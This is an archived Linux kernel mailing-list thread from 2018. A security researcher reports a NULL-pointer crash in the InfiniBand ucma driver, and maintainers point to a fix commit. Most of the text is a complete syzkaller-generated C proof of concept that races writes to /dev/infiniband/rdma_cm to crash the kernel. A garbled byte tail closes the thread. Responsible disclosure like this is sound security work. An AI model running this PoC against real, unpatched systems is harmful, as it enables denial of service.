答复: [lianyihan@xxxxxx: linux driver infiniband vulnerability report]

连一汉 <lianyihan@xxxxxx> · Mon, 2 Apr 2018 02:27:46 +0000

Oh, nice

Thanks

-----邮件原件-----
发件人: Leon Romanovsky [mailto:leonro@xxxxxxxxxxxx] 
发送时间: 2018年3月30日 18:01
收件人: Dan Carpenter
抄送: Jason Gunthorpe; linux-rdma@xxxxxxxxxxxxxxx; 连一汉; edumazet@xxxxxxxxxx; security@xxxxxxxxxx
主题: Re: [lianyihan@xxxxxx: linux driver infiniband vulnerability report]

On Fri, Mar 30, 2018 at 11:30:00AM +0300, Dan Carpenter wrote:
> Thank you for your report!
>
> The syzcaller stuff is all public information so we just push it out 
> to the normal email lists.

We believe that this commit [1] fixes it.

[1] https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/drivers/infiniband/core?id=e8980d67d6017c8eee8f9c35f782c4bd68e004c9

Thanks

>
> regards,
> dan carpenter
>
> ----- Forwarded message from 连一汉 <lianyihan@xxxxxx> -----
>
> Date: Fri, 30 Mar 2018 08:16:09 +0000
> From: 连一汉 <lianyihan@xxxxxx>
> To: "edumazet@xxxxxxxxxx" <edumazet@xxxxxxxxxx>
> CC: "security@xxxxxxxxxx" <security@xxxxxxxxxx>
> Subject: linux driver infiniband vulnerability report
> Message-ID: 
> <A962A2D04FAB5C4499FEFD15B642FA0A35E231EE@xxxxxxxxxxxxxxxxxxx>
>
> Hi,
>
> I’m Lian yihan, a security researcher of Qihoo 360 GearTeam.
>
> I found a vulnerability of Linux driver infiniband, and I have reproduce it on Linux-4.14.31.
>
> =============== crash info =================
> #0  rdma_destroy_id (id=0x0 <irq_stack_union>) at 
> drivers/infiniband/core/cma.c:1652
> #1  0xffffffff83140a06 in ucma_destroy_id (file=<optimized out>, inbuf=<optimized out>, in_len=<optimized out>, out_len=<optimized out>)
>     at drivers/infiniband/core/ucma.c:606
> #2  0xffffffff83140f1f in ucma_write (filp=<optimized out>, 
> buf=0x20000380 "\001", len=24, pos=<optimized out>) at 
> drivers/infiniband/core/ucma.c:1626
> #3  0xffffffff81a097a6 in __vfs_write (file=0xffff88007f20e6c0, 
> p=<optimized out>, count=24, pos=0xffff880090c97d98) at 
> fs/read_write.c:480
> #4  0xffffffff81a09d48 in vfs_write (file=0xffff88007f20e6c0, 
> buf=0x20000380 "\001", count=24, pos=<optimized out>) at 
> fs/read_write.c:544
>
> You can see (struct rdma_cm_id*) pointer id of rdma_destroy_id is zero.
>
> There are many functions of ucma.c have similar BUGs.
>
> And I have seen some similar BUGs on your “syzbot” website, But I don’t find the patch.
>
> I try to write a simple patch in ucma_create_id() function as follow(I’m not sure it is complete enough):
>
> static ssize_t ucma_create_id(struct ucma_file *file, const char __user *inbuf,
>                                int in_len, int out_len) {
>         …
> mutex_lock(&mut);                                        // The lock could patch the BUG mentioned in this email, but I’m not sure it is complete enough.
>         ctx->uid = cmd.uid;
>         ctx->cm_id = rdma_create_id(current->nsproxy->net_ns,
>                                      ucma_event_handler, ctx, cmd.ps, qp_type);
>         mutex_unlock(&mut);
>         …
> }
>
> The attachment is my POC. Of course you need to build infiniband in kernel, if you want to reproduce it.
>
> Regards
>
>
>
> // autogenerated by syzkaller (http://github.com/google/syzkaller)
>
> #define _GNU_SOURCE
> #include <endian.h>
> #include <linux/futex.h>
> #include <pthread.h>
> #include <stdint.h>
> #include <stdlib.h>
> #include <string.h>
> #include <sys/syscall.h>
> #include <unistd.h>
>
> static void test();
>
> void loop()
> {
>   while (1) {
>     test();
>   }
> }
>
> struct thread_t {
>   int created, running, call;
>   pthread_t th;
> };
>
> static struct thread_t threads[16];
> static void execute_call(int call);
> static int running;
> static int collide;
>
> static void* thr(void* arg)
> {
>   struct thread_t* th = (struct thread_t*)arg;
>   for (;;) {
>     while (!__atomic_load_n(&th->running, __ATOMIC_ACQUIRE))
>       syscall(SYS_futex, &th->running, FUTEX_WAIT, 0, 0);
>     execute_call(th->call);
>     __atomic_fetch_sub(&running, 1, __ATOMIC_RELAXED);
>     __atomic_store_n(&th->running, 0, __ATOMIC_RELEASE);
>     syscall(SYS_futex, &th->running, FUTEX_WAKE);
>   }
>   return 0;
> }
>
> static void execute(int num_calls)
> {
>   int call, thread;
>   running = 0;
>   for (call = 0; call < num_calls; call++) {
>     for (thread = 0; thread < sizeof(threads) / sizeof(threads[0]); thread++) {
>       struct thread_t* th = &threads[thread];
>       if (!th->created) {
>         th->created = 1;
>         pthread_attr_t attr;
>         pthread_attr_init(&attr);
>         pthread_attr_setstacksize(&attr, 128 << 10);
>         pthread_create(&th->th, &attr, thr, th);
>       }
>       if (!__atomic_load_n(&th->running, __ATOMIC_ACQUIRE)) {
>         th->call = call;
>         __atomic_fetch_add(&running, 1, __ATOMIC_RELAXED);
>         __atomic_store_n(&th->running, 1, __ATOMIC_RELEASE);
>         syscall(SYS_futex, &th->running, FUTEX_WAKE);
>         if (collide && call % 2)
>           break;
>         struct timespec ts;
>         ts.tv_sec = 0;
>         ts.tv_nsec = 20 * 1000 * 1000;
>         syscall(SYS_futex, &th->running, FUTEX_WAIT, 1, &ts);
>         if (running)
>           usleep((call == num_calls - 1) ? 10000 : 1000);
>         break;
>       }
>     }
>   }
> }
>
> uint64_t r[2] = {0xffffffffffffffff, 0xffffffff}; void 
> execute_call(int call) {
>   long res;
>   switch (call) {
>   case 0:
>     memcpy((void*)0x20000640, "/dev/infiniband/rdma_cm", 24);
>     res = syscall(__NR_openat, 0xffffffffffffff9c, 0x20000640, 2, 0);
>     if (res != -1)
>       r[0] = res;
>     break;
>   case 1:
>     *(uint32_t*)0x20000340 = 0;
>     *(uint16_t*)0x20000344 = 0x18;
>     *(uint16_t*)0x20000346 = 0xfa00;
>     *(uint64_t*)0x20000348 = 0;
>     *(uint64_t*)0x20000350 = 0x20000100;
>     *(uint16_t*)0x20000358 = 0x106;
>     *(uint8_t*)0x2000035a = 0;
>     *(uint8_t*)0x2000035b = 0;
>     *(uint8_t*)0x2000035c = 0;
>     *(uint8_t*)0x2000035d = 0;
>     *(uint8_t*)0x2000035e = 0;
>     *(uint8_t*)0x2000035f = 0;
>     res = syscall(__NR_write, r[0], 0x20000340, 0x20);
>     if (res != -1)
>       r[1] = *(uint32_t*)0x20000100;
>     break;
>   case 2:
>     *(uint32_t*)0x20000380 = 1;
>     *(uint16_t*)0x20000384 = 0x10;
>     *(uint16_t*)0x20000386 = 0xfa00;
>     *(uint64_t*)0x20000388 = 0x20000300;
>     *(uint32_t*)0x20000390 = r[1];
>     *(uint32_t*)0x20000394 = 0;
>     syscall(__NR_write, r[0], 0x20000380, 0x18);
>     break;
>   }
> }
>
> void test()
> {
>   execute(3);
>   collide = 1;
>   execute(3);
> }
>
> int main()
> {
>   syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
>   for (;;) {
>     loop();
>   }
> }
>
>
> ----- End forwarded message -----
> --
> To unsubscribe from this list: send the line "unsubscribe linux-rdma" 
> in the body of a message to majordomo@xxxxxxxxxxxxxxx More majordomo 
> info at  http://vger.kernel.org/majordomo-info.html
��.n��������+%������w��{.n�����{���fk��ܨ}���Ơz�j:+v�����w����ޙ��&�)ߡ�a����z�ޗ���ݢj��w�f